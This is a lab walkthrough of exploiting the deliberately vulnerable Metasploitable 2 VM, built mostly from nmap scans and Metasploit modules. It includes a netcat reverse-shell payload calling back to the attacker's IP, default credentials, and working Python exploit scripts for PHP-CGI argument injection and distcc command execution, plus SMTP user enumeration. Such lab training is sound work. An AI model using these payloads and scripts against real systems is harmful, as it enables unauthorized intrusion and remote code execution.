Description: This screenshot shows the VulnHub (and Rapid7) page for Metasploitable 2, a deliberately vulnerable Linux virtual machine used for security testing and practice.
Author: Metasploit
Date release: 12 Jun 2012
Here, we can see the VirtualBox (or VMware) settings for the Metasploitable 2 virtual machine, including memory, network adapters, and other configuration details before powering it on.
After starting the VM, Metasploitable 2 displays its boot sequence and ASCII banner. The default login credentials (msfadmin:msfadmin) are shown in the welcome message.
Using netdiscover to identify live hosts on the local network. The scan reveals the IP address of the Metasploitable 2 VM (192.168.164.130 in this example).
Running Nmap on the Metasploitable 2 IP address shows multiple open ports and services (FTP, SSH, Telnet, SMTP, etc.). This confirms the system is intentionally exposed for testing various exploits.
Using nmap --script vuln to detect known vulnerabilities. Nmap identifies the vsftpd 2.3.4 backdoor vulnerability, indicating a potential remote root exploit.
A quick Google search for “vsftpd 2.3.4 exploit github” yields multiple public repositories containing proof-of-concept code and scripts for exploiting the vsftpd backdoor.
An example of a Python exploit script on GitHub that targets vsftpd 2.3.4. The repository provides usage instructions and explains how the backdoor was introduced into the service.
Here is the raw Python code for the vsftpd 2.3.4 exploit. It demonstrates how the backdoor is triggered and allows remote code execution.
Executing the exploit against Metasploitable 2 at 192.168.164.130:21. The result shows we’ve successfully gained a root shell (uid=0(root) gid=0(root)), confirming that the vsftpd backdoor was exploited successfully.
This screenshot displays a Reverse Shell Cheat Sheet resource (e.g., from Pentestmonkey). It lists various commands in different languages (Bash, Python, PHP, Ruby, Netcat, etc.) to obtain a reverse shell on a target machine.
Here, the vsftpd-exploit.py script is executed with a custom payload: nc -e /bin/sh 192.168.164.128 1234. Instead of running a command in the 6200 shell, this makes Metasploitable 2 connect back to the attacking machine (192.168.164.128) on port 1234 with /bin/sh attached. The listener from the next step must already be running when the payload fires; otherwise the connection is refused and the shell is lost.
We start a Netcat (nc) listener on port 1234 using sudo nc -lvnp 1234 (sudo is not actually needed for a port above 1023). The connection from the Metasploitable 2 VM arrives, giving us a remote root shell (uid=0(root) gid=0(root)).
An Nmap scan (nmap -p22) is performed against Metasploitable 2, confirming that OpenSSH 4.7p1 is running. This helps us identify potential SSH-related vulnerabilities or default credentials.
In Metasploit, we use search ssh_login to locate relevant modules. The auxiliary/scanner/ssh/ssh_login module appears, which can be used to brute-force or test known SSH credentials.

Another view of the Metasploitable 2 login prompt, reminding users never to expose this vulnerable VM on an untrusted network. The default credentials are once again displayed: msfadmin:msfadmin.
This screenshot shows the ssh_login module options in Metasploit. Various parameters can be configured, such as RHOSTS (target IP), RPORT (SSH port), USER_FILE, PASS_FILE, and more.
After running the ssh_login auxiliary module, we obtain valid SSH credentials. Metasploit automatically opens sessions for each successful login, granting shell access to Metasploitable 2.
An Nmap scan against port 23 shows that Telnet is open on the Metasploitable 2 machine. The scan results confirm the OS as Linux and suggest another potential attack vector.
Using search telnet_login in Metasploit, we discover the auxiliary/scanner/telnet/telnet_login module. This module can brute-force or test known credentials against Telnet services.
After running the auxiliary/scanner/telnet/telnet_login module, we successfully log in to Metasploitable 2 via Telnet using the default credentials (msfadmin:msfadmin). We gain a command shell, confirming that Telnet is open and vulnerable to simple credential attacks.
An Nmap scan (nmap --script=ssl-poodle -p25) checks for potential SSL/TLS vulnerabilities on port 25. The output references OpenSSL details and indicates whether the service is vulnerable to attacks like POODLE or other SSL-based exploits.
Here, Metasploit is launched, and we use search smtp_enum to find modules for enumerating SMTP services. This is useful for discovering valid email accounts or usernames via VRFY/EXPN commands.
The auxiliary/scanner/smtp/smtp_enum module is selected, and its options are displayed. We can set parameters like RHOSTS, RPORT, and user/password lists to attempt user enumeration on the SMTP service.
Using Netcat to manually interact with the SMTP service on port 25. Commands like VRFY ftp, VRFY mysql, and others help confirm whether certain users exist on the Metasploitable 2 system.
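The manual VRFY probing above, generalised to a list of candidate users. This is an added example and not the smtp_enum module or the page's own commands: it classifies replies by SMTP code (250 or 252 for a known local user, 550 for an unknown one, anything else left undetermined, e.g. 502 when VRFY is disabled). The reply wording in the constructed stand-in server follows what Postfix on Metasploitable 2 returns, but the server itself exists only so the script can be run offline; the HELO name is arbitrary.

```python
"""SMTP user enumeration with VRFY, plus a constructed Postfix-like stand-in for offline use."""
import socket
import threading


def smtp_reply(sock):
    """Read one (possibly multi-line) SMTP reply; return (code, full_text)."""
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
        lines = buf.split(b"\r\n")
        # the final line of a reply has a space (not a dash) right after the 3-digit code
        if len(lines) >= 2 and len(lines[-2]) >= 4 and lines[-2][3:4] == b" ":
            break
    text = buf.decode(errors="replace")
    return int(text[:3]), text.strip()


def vrfy_users(host, users, port=25, helo="attacker", timeout=5):
    """Return {user: True (exists) / False (unknown) / None (undetermined)} using VRFY."""
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        smtp_reply(s)                                    # 220 banner
        s.sendall(f"HELO {helo}\r\n".encode())
        smtp_reply(s)                                    # 250
        for user in users:
            s.sendall(f"VRFY {user}\r\n".encode())
            code, _ = smtp_reply(s)
            if code in (250, 252):
                results[user] = True                     # 252: accepted for delivery = local user
            elif code in (550, 551, 553):
                results[user] = False                    # rejected: no such mailbox
            else:
                results[user] = None                     # 502 = VRFY disabled, 500 = syntax error
        s.sendall(b"QUIT\r\n")
    return results


def start_fake_smtp(known_users):
    """Constructed stand-in for the Metasploitable 2 Postfix service (offline testing only)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        c, _ = srv.accept()
        c.sendall(b"220 metasploitable.localdomain ESMTP Postfix (Ubuntu)\r\n")
        f = c.makefile("rb")
        for raw in f:
            verb, _, arg = raw.decode().strip().partition(" ")
            verb = verb.upper()
            if verb == "HELO":
                c.sendall(b"250 metasploitable.localdomain\r\n")
            elif verb == "VRFY":
                if arg in known_users:
                    c.sendall(f"252 2.0.0 {arg}\r\n".encode())
                else:
                    c.sendall(f"550 5.1.1 <{arg}>: Recipient address rejected: "
                              f"User unknown in local recipient table\r\n".encode())
            elif verb == "QUIT":
                c.sendall(b"221 2.0.0 Bye\r\n")
                break
            else:
                c.sendall(b"502 5.5.2 Error: command not recognized\r\n")
        c.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = start_fake_smtp({"ftp", "mysql", "postgres", "msfadmin"})
    print(vrfy_users("127.0.0.1", ["ftp", "mysql", "nosuchuser"], port=port))
```

A 252 reply only proves the address is accepted for delivery; on a relay that accepts everything it tells you nothing, so compare a known-bad name first before trusting the results.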
An Nmap scan (nmap -A -p80) is run against the Metasploitable 2 host to identify the web server. The result shows Apache 2.2.8 (Ubuntu) DAV/2 and additional OS details.
In Metasploit, search http_version locates the auxiliary/scanner/http/http_version module. This module can help identify the exact HTTP server version, which is useful for targeting known vulnerabilities.
Visiting the target’s web server reveals a PHP info page showing PHP 5.2.4-2ubuntu5.10. This information is crucial for pinpointing exploits that target specific PHP versions.
Using search php_cgi in Metasploit locates the php_cgi_arg_injection exploit. This vulnerability allows remote code execution by injecting arguments into the PHP CGI interface.
After setting RHOSTS to 192.168.164.130 and running the php_cgi_arg_injection module, we obtain a Meterpreter session running as the web server user (www-data). We confirm the target OS and user privileges, and can now pivot to further post-exploitation steps.
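What the php_cgi_arg_injection module actually sends, as an added example (not the module's code): for CVE-2012-1823, php-cgi treats a query string that contains no literal "=" as command-line arguments, so "-d" directives can be injected to enable allow_url_include and prepend php://input, which makes the POST body execute as PHP. The "=" inside each directive is percent-encoded so Apache still hands the query over as argv. The request path defaults to /cgi-bin/php as an assumption (use whatever the module's TARGETURI shows for your target); the stand-in HTTP server below is constructed only so the request can be inspected offline.

```python
"""PHP-CGI argument injection (CVE-2012-1823) request builder with an offline stand-in server."""
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer


def php_cgi_query(extra_directives=("safe_mode=off", "disable_functions=")):
    """Build the argv-injection query: '-d directive' pairs joined by '+', with '=' percent-encoded
    so the query never contains a literal '=' (that is the condition for php-cgi to treat it as argv)."""
    directives = ["allow_url_include=on", "auto_prepend_file=php://input", *extra_directives]
    argv = []
    for d in directives:
        argv += ["-d", d]
    argv.append("-n")                      # ignore php.ini so the injected -d values win
    return "+".join(urllib.parse.quote(a, safe="") for a in argv)


def exploit(host, port=80, path="/cgi-bin/php", php_code="<?php system('id'); ?>", timeout=5):
    """POST the PHP code to the injected query; returns (status, response body)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("POST", f"{path}?{php_cgi_query()}", body=php_code.encode(),
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, body


class _FakePhpCgi(BaseHTTPRequestHandler):
    """Constructed stand-in: reconstructs the argv php-cgi would see and reports whether the
    POST body would be prepended and executed. It runs no PHP."""

    def do_POST(self):
        query = urllib.parse.urlsplit(self.path).query
        if "=" in query:                   # a real query string, not argv: nothing injected
            argv = []
        else:
            argv = [urllib.parse.unquote(t) for t in query.split("+")]
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        injected = "auto_prepend_file=php://input" in argv and "allow_url_include=on" in argv
        out = "executed body" if injected and body.startswith(b"<?php") else "no execution"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(out.encode())

    def log_message(self, *args):          # keep the demo quiet
        pass


def start_fake_php_cgi():
    srv = HTTPServer(("127.0.0.1", 0), _FakePhpCgi)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1]


if __name__ == "__main__":
    port = start_fake_php_cgi()
    print(php_cgi_query())
    print(exploit("127.0.0.1", port))
```

The fix in PHP 5.3.12/5.4.2 was to stop passing such query strings to the CGI binary as argv; on a patched server the same request is just a harmless query string, which is why the check on "=" is the whole story.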
Using Nmap with the smb-os-discovery script (nmap -p 139,445 --script smb-os-discovery 192.168.164.130) to gather SMB information about the Metasploitable 2 host. It reveals OS details, NetBIOS name, domain, and system time.
We query the target's NetBIOS name with nmblookup and then use smbclient -L with a null session (-N, no password) to list available shares. The results show the IPC$ and ADMIN$ shares along with the other resources exposed on the Metasploitable 2 system.
Running enum4linux (enum4linux -v 192.168.164.130) to gather more detailed SMB and NetBIOS information. This includes domain/workgroup names, session checks, and SIDs for the Metasploitable 2 host.
In Metasploit, we use search samba usermap to locate the exploit/multi/samba/usermap_script module. This is a known vulnerability (CVE-2007-2447) that can lead to remote code execution on certain Samba versions.
After configuring and running the usermap_script exploit (exploit/multi/samba/usermap_script), we successfully gain a remote shell with root privileges (uid=0(root) gid=0(root)), demonstrating a classic Samba vulnerability on Metasploitable 2.
An Nmap scan against ports 512, 513, and 514 (nmap -A -p 512,513,514 192.168.164.130) checks for rsh, rexec, and rlogin services. These legacy “R-services” can be insecure if misconfigured.
Demonstrating rlogin (rlogin -l root 192.168.164.130) to the Metasploitable 2 machine, resulting in direct root access without any password prompt, because the target trusts remote hosts via its rhosts configuration. This highlights how dangerous R-services are if left unsecured. Note that on Kali the rsh-client package must be installed first; without it, rlogin is a wrapper around ssh and the connection goes to port 22 instead.
Here, we run Nmap (nmap -A -p1099 192.168.164.130) to detect a Java RMI service listening on port 1099. The scan output indicates a GNU Classpath grmiregistry, suggesting potential vulnerabilities in RMI configurations.
Within Metasploit, using search java_rmi finds modules like exploit/multi/misc/java_rmi_server. This module targets insecure RMI registry configurations that allow remote code execution.
By setting RHOSTS to 192.168.164.130 and running the java_rmi_server exploit, we successfully obtain a Meterpreter session on Metasploitable 2. The shell output confirms system details, user privileges, and directory listings.
Using Nmap with -A -p1524 against Metasploitable 2, we discover a bind shell service labeled as “bindshell Metasploitable root shell.” This indicates an open backdoor on port 1524 that could grant direct root access.
By using Netcat (nc 192.168.164.130 1524), we connect to the bind shell and immediately gain a root shell on Metasploitable 2. The directory listing (ls -la) confirms our elevated privileges.
An Nmap scan (nmap --script=vuln -A -p3306) checks for known MySQL vulnerabilities on Metasploitable 2. The output references potential CVEs (e.g., CVE-2012-2122, CVE-2016-6662), indicating insecure MySQL configurations that can be exploited.
Here, we log into the MySQL service as root (mysql -h 192.168.164.130 -u root). No password is set on the MySQL root account, so the login succeeds without -p. We list the available databases (such as dvwa, owasp10, userdb) and discover tables that include user credentials. Default or weak passwords like these are typical of Metasploitable 2.
Using Nmap with --script=vuln -A -p3632, we detect a DistCC Daemon running on Metasploitable 2. The results indicate a known vulnerability (CVE-2004-2687) that allows remote command execution.

In Metasploit, we run search distcc to locate the exploit/unix/misc/distcc_exec module. This module exploits the DistCC service by sending malicious commands that the server executes remotely.
After configuring the distcc_exec exploit and selecting a suitable payload, we successfully gain a remote shell as the daemon user on Metasploitable 2. We confirm our privileges with commands like id and uname -a.
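The DistCC job that distcc_exec sends, as an added Python example (not the Metasploit module's code). CVE-2004-2687 is not a memory bug: distccd simply executes whatever "compiler" argv the client supplies, so the job names sh -c <command> as the compiler. The trailing "# -c main.c -o main.o" tokens are there so the daemon's argument scan finds the -c/-o pair it expects, while the shell ignores them as a comment. The wire format (4-byte token name + 8 hex digits, string tokens followed by their bytes) is protocol version 1; the dummy source sent in the DOTI token is an assumption of this example.

```python
"""DistCC protocol-v1 job that turns distccd into a remote command runner (CVE-2004-2687)."""
import socket


def _token(name, value):
    """Wire token: 4-char name + 8 hex digits; string tokens are followed by their payload."""
    if isinstance(value, int):
        return f"{name}{value:08x}".encode()
    data = value.encode() if isinstance(value, str) else value
    return f"{name}{len(data):08x}".encode() + data


def build_distcc_job(command):
    """Job whose 'compiler' is sh -c <command>; the comment keeps the daemon's -c/-o scan happy."""
    argv = ["sh", "-c", command, "#", "-c", "main.c", "-o", "main.o"]
    job = _token("DIST", 1) + _token("ARGC", len(argv))
    for arg in argv:
        job += _token("ARGV", arg)
    job += _token("DOTI", "int main;\n")   # assumption: any short 'preprocessed source' will do
    return job


def parse_distcc_reply(data):
    """Parse DONE/STAT/SERR/SOUT/DOTO tokens from the daemon's reply into a dict."""
    fields, i = {}, 0
    while i + 12 <= len(data):
        name = data[i:i + 4].decode()
        value = int(data[i + 4:i + 12], 16)
        i += 12
        if name in ("DONE", "STAT"):        # numeric tokens: protocol version, exit status
            fields[name] = value
        else:                               # string tokens: stderr, stdout, object file
            fields[name] = data[i:i + value]
            i += value
    return fields


def distcc_exec(host, command, port=3632, timeout=10):
    """Run one command on the daemon; returns (stdout, stderr, exit status)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_distcc_job(command))
        buf = b""
        try:
            while True:
                chunk = s.recv(65536)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass
    reply = parse_distcc_reply(buf)
    return (reply.get("SOUT", b"").decode(errors="replace"),
            reply.get("SERR", b"").decode(errors="replace"),
            reply.get("STAT"))


if __name__ == "__main__":
    print(build_distcc_job("id"))
    # constructed reply in the daemon's format, as the parser would see it for `id`
    sample = (b"DONE00000001STAT00000000SERR00000000"
              b"SOUT00000027uid=1(daemon) gid=1(daemon) groups=1(daemon)\n" + b"DOTO00000000")
    print(parse_distcc_reply(sample))
```

Because the shell's stdout comes back in the SOUT token, the command is not blind: distcc_exec returns the output directly, which is why the Metasploit module can run as the daemon user without a reverse shell.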
An Nmap scan (nmap --script=vuln -A -p5432) identifies PostgreSQL 8.3.7 running on Metasploitable 2. The output also notes potential SSL vulnerabilities (like POODLE or CCS injection) if SSL is enabled on the service.
Within Metasploit, we use search postgresql to discover a range of PostgreSQL-related modules. These include auxiliary scanners (for enumeration) and exploits (for privilege escalation or remote code execution) targeting PostgreSQL services.
Here, we select the exploit/linux/postgres/postgres_payload module in Metasploit and configure the necessary options (e.g., RHOSTS, RPORT, LHOST, LPORT). This module attempts to gain a remote shell by injecting and executing malicious code through the PostgreSQL service.
After configuring and running the postgres_payload exploit (exploit/linux/postgres/postgres_payload), we successfully obtain a Meterpreter session on the Metasploitable 2 host. System information confirms we’re running on an i686 architecture with Linux kernel 2.6.x.
We run Nmap with --script=vuln -A -p5900 to probe the VNC service on Metasploitable 2. The output indicates that VNC (Virtual Network Computing) is open, which could allow remote desktop connections if not properly secured.
Using search vnc_login in Metasploit locates auxiliary/scanner/vnc/vnc_login, a module for brute forcing or testing default credentials against a VNC service. This can reveal weak or no-password configurations.
We connect to the Metasploitable 2 machine via VNC (e.g., vncviewer 192.168.164.130). The screenshot shows a remote desktop session as root; the VNC password on Metasploitable 2 is the word "password", so weak authentication is all that protects this service.
Here, we run nmap --script=vuln -A -p6667 and discover an UnrealIRCd service. The scan references a known backdoor vulnerability (e.g., CVE-2010-2075) that allows remote command execution if the service is unpatched.
In Metasploit, search unreal_ircd locates the exploit/unix/irc/unreal_ircd_3281_backdoor module. This is a known exploit that leverages the backdoor introduced in certain UnrealIRCd versions.
After setting the RHOSTS, RPORT, and choosing a payload, we exploit UnrealIRCd and gain a remote shell. The shell output (id, directory listings) confirms root-level access on the Metasploitable 2 host.
Using Nmap with --script=vuln -A -p8180, we detect Apache Tomcat/Coyote JSP engine 1.1. This indicates a Tomcat instance running on an alternate port (8180) that might be vulnerable to known exploits or misconfigurations, most importantly a Manager application protected only by default credentials.
We run search apache_tomcat in Metasploit, finding multiple modules related to Tomcat exploitation, such as remote code execution via tomcat_mgr_deploy, credential brute force, or weak default credentials.
Using exploit/multi/http/tomcat_mgr_deploy in Metasploit, we authenticate to the Tomcat Manager application with its default credentials (tomcat:tomcat on Metasploitable 2) and deploy a WAR containing a Metasploit Java payload. Once deployed, a Meterpreter session is opened, granting remote access to the Metasploitable 2 system. System commands confirm the session runs as the Tomcat service account (tomcat55), not as root, so privilege escalation would be the next step.